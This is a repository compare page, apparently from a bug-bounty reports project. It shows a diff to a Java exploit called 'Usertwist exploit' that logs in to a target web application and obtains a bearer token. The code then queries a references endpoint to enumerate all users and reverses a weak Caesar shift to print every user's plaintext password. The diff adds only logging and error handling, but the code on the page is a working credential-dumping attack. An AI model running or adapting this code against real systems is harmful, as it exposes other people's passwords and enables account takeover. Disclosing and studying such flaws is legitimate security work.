Stage/bug-bounty-reports
4
0
Fork 0
Code Issues 3 Pull Requests Actions Packages Projects Releases 2 Wiki Activity

Compare commits

base: Stage:script-release
Branches Tags
Stage:main Stage:bot_exclusion Stage:virtual_threads Stage:without_bypass Stage:http_constructor Stage:new_caesar Stage:ssl_port Stage:dev Stage:script
Stage:enhanced-script Stage:script-release
..
compare: Stage:script
Branches Tags
Stage:bot_exclusion Stage:virtual_threads Stage:without_bypass Stage:http_constructor Stage:new_caesar Stage:ssl_port Stage:dev Stage:script Stage:main
Stage:enhanced-script Stage:script-release

2 Commits
script-rel ... script

Author SHA1 Message Date
Mateo
86495716e5 Error handle 2024-08-01 13:30:28 +02:00
Mateo
8e73544d27 Added some verbose 2024-08-01 10:54:59 +02:00
1 changed files with 17 additions and 1 deletions
Expand all files Collapse all files

18
src/fr/motysten/usertwist/exploit/Main.java
View File

@@ -22,6 +22,7 @@ public class Main {
BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
System.out.println("Usertwist exploit by Motysten");
System.out.println("Please don't use for unethical purpose !\n");
String readLine;
System.out.println("Please enter the URL to attack (leave empty to use default) :");
@@ -42,18 +43,30 @@ public class Main {
requestJSON.put("username", username);
requestJSON.put("password", password);
System.out.println("Gathering Bearer token...");
HttpRequest request = HttpRequest.newBuilder(URI.create(link + "/login"))
.POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
.build();
HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
if (response.statusCode() == 401) {
System.err.println("Invalid credentials ! Pleas try again (defaults credentials could help)");
System.exit(1);
}
JSONObject responseObject = new JSONObject(response.body());
String token = responseObject.optString("token");
System.out.println("Token found: " + token);
requestJSON = new JSONObject();
requestJSON.put("term", "");
requestJSON.put("entity", "users");
System.out.println("\nScanning for existing users...");
request = HttpRequest.newBuilder(URI.create(link + "/references"))
.POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
.setHeader("Authorization", "Bearer " + token)
@@ -62,12 +75,15 @@ public class Main {
response = client.send(request, HttpResponse.BodyHandlers.ofString());
JSONArray usersArray = new JSONArray(response.body());
System.out.println(usersArray.length() + " users found !");
System.out.println("\nDecrypting passwords...\n");
for (int i = 0; i < usersArray.length(); i++) {
JSONObject user = usersArray.getJSONObject(i);
String login = user.getString("username");
String password = Cesar.cesarRotate(user.getString("data"), -4);
System.out.println(login + " => " + password);
System.out.println((i + 1) + ". " + login + " => " + password);
}
}